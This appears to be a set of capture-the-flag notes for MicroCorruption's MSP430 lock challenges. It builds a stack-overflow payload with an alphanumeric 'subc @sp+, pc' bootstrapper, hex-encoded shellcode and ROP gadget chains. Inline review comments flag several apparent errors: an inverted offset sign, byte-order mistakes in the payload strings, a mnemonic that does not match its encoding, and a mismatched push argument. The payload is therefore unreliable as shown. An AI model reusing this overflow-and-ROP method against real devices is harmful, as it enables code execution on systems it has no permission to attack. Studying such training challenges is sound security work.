; Goal: execute code from 0x25b6
; (MicroCorruption / MSP430 notes: the assembly below is MSP430 syntax, not NASM as the mirror labels it)
; stack buffer: 43ed
; mem buffer: 2400
passwordpassword1[retval][pcoffset]0[realfunc][padding]0[bootstrapper]
retval = 0x4430 ; &bootstrapper
pcoffset = 0x2443-0x4430 ; &realfunc - retval
; NOTE(review): subc computes dst = dst - src - 1 + C, so the word popped into pc must be
; (pc after the subc fetch) - &realfunc, adjusted for the carry flag at that point; the sign
; written here (&realfunc - retval) looks inverted — confirm in the debugger before relying on it
padding = "A"*0x30 + "1" ; alignment
bootstrapper = subc @sp+, pc ; 3071 (memory bytes 0x30 0x71 = "0q", word 0x7130)
'passwordpassword1' + 'D0' + '??' + '0' + [realfunc][padding]0[bootstrapper]
; NOTE(review): MSP430 is little-endian — retval 0x4430 lands in memory as bytes 30 44 ("0D"),
; not 'D0'; the same byte swap applies to the "Dd"/"Dl" gadget addresses further down. Verify the
; byte order of every address in the payload before sending it.
bootstrapper:
add @sp+, r15 ; NOTE(review): the bootstrapper above is subc @sp+, pc (3071); add @sp+, r15 encodes as
              ; bytes 3f 51 ("?Q"), where '?' (0x3f) is not alphanumeric — confirm which instruction is meant
realfunc:
push #0x7f
call 45fc
3012 7e00 b012 fc45 ; push #imm ; imm ; call #imm ; imm
; NOTE(review): 7e00 is #0x7e, but the mnemonic above says push #0x7f — one of the two is a typo;
; confirm the intended argument to the function at 0x45fc
; Step 1: Create a bootstrapper out of alphanumeric characters, and store it on the stack
; this instruction pops a word off the stack and subtracts it (with borrow: pc = pc - word - 1 + C)
; from pc. Perfect for a pc-relative redirect whose offset we control from the stack.
subc @sp+, pc
b'passwordpassword1'+(b'\x30\x71'*0x1a4)+b'00000000000000' ; 0x1a4 copies of subc @sp+, pc (0x7130), then 14 '0' bytes (0x30)
code snippets:
; pop to register
3n413041 ; nA0A
pop Rn
ret
; popadd to register
add @sp+, rN ; nq0A
; NOTE(review): 'q' (0x71) is the subc opcode byte, so "nq" encodes subc @sp+, rN (consistent with the
; 3071 bootstrapper); add @sp+, rN would be 0x513n, i.e. "nQ" with 'Q' (0x51). Either the mnemonic or
; the ASCII is wrong — check which one the payload actually needs.
ret
32413041 ; 2A0A
pop sr
ret
ROP gadgets:
Pop sr
Move byte relative to R4 into r15
4464 ("Dd"):
mov.b -0x4(r4), r15
sxt r15
add #0x8, sp
pop r4
ret
Pop r4:
446c ("Dl")
pop r4
ret
passwordpassword1DlDd
; NOTE(review): if 0x446c and 0x4464 are meant to be consumed by ret as little-endian words, their
; in-memory bytes are "lD" and "dD"; as typed here ("Dl", "Dd") the words would be 0x6c44 / 0x6444.
; Double-check the byte order against the stack in the debugger.